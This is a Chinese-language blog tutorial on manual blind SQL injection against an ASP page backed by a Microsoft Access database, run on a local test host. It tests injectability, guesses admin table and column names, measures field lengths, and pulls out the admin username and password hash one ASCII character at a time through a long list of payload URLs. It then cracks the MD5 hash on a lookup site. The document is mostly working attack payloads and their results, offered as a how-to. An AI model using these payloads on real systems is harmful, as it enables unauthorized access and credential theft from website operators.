内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

SQL注入access数据库【2】

2018-11-06 20:21 出处:清屏网 人气: 评论(0

首先是sql注入产生的条件:

1.参数的传递

2.参数值可以带入到数据库

我这里是本地搭建的环境,接另外一种方法注入

手工注入值半猜解

第一步 判断是否可以注入

URL:http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139

and 1=1 返回正常

and 1=2 返回不正常

第二步 猜解数据库表名

语句

and exists (select * from 表名)

这里的表名,可以替换成常用的表,

常用的表名

admin、a_admin、x_admin、m_admin、adminuser、adminstrator...

如果存在那么返回就是正常的,不存在返回就是错误的,运气好的,一次性就爆出来了

第三步 猜解字段

语句

and exists (select 字段名 from 表名)

这里猜解了两个字段名

and exists(select admin from admin)

and exists(select password from admin)

第四步 判断字段长度

语句

and (select top 1 len(字段) from 表名)>0

用来测试的语句

and (select top 1 len(admin) from admin)>0

and (select top 1 len(password) from admin)>0

这里判断的 admin 长度为5

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 len(password) from admin)=16

下面判断password长度为16,这里就不上图了,大家自行检测

第五步 折中猜ASCII码

这里简单说下 ASCII码 65~90为26个大写英文字母,97~122号为26个小写英文字母

语句

and (select top 1 asc(mid(字段,1,1)) from 表名)>0

首先猜 admin的吧

第一位

and (select top 1 asc(mid(admin,1,2)) from admin)>50 错了

and (select top 1 asc(mid(admin,1,2)) from admin)<100 对了

那么就在这个中间 我们继续 更改一下 慢慢的猜出来是 97

第二位是 100

这里下面就不放图了, 我们就直接上结果了

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(admin,1,1)) from admin)=97

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(admin,2,1)) from admin)=100

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(admin,3,1)) from admin)=109

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(admin,4,1)) from admin)=105

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(admin,5,1)) from admin)=110

用户名的ASCII码是 97,100,109,105,110

下面继续猜密码的ASCII码

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,1,1)) from admin)=97

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,2,1)) from admin)=52

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,3,1)) from admin)=56

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,4,1)) from admin)=101

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,5,1)) from admin)=49

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,6,1)) from admin)=57

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,7,1)) from admin)=48

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,8,1)) from admin)=102

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,9,1)) from admin)=97

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,10,1)) from admin)=102

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,11,1)) from admin)=99

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,12,1)) from admin)=50

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,13,1)) from admin)=53

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,14,1)) from admin)=55

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,15,1)) from admin)=100

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and (select top 1 asc(mid(password,16,1)) from admin)=51

密码的ASCII码就是 97,52,56,101,49,57,48,102,97,102,99,50,53,55,100,51

这时候我们可以对应ASCII码表挨个转换过去 也可以用小葵转换工具

也有在线转换工具, 直接输入到ASCII码 挨个提交 转换结果就好了

我这里转换出来

用户名:admin

密码:a48e190fafc257d3

密码是一个MD5加密 老规矩,我们扔到MD5解密的网站 解密

md5解密: https://www. cmd5.com/

解开的密码是 bendss

分享给小伙伴们:
本文标签: SQL注入access数据库

相关文章

发表评论愿您的每句评论,都能给大家的生活添色彩,带来共鸣,带来思索,带来快乐。

CopyRight © 2015-2016 QingPingShan.com , All Rights Reserved.

清屏网 版权所有 豫ICP备15026204号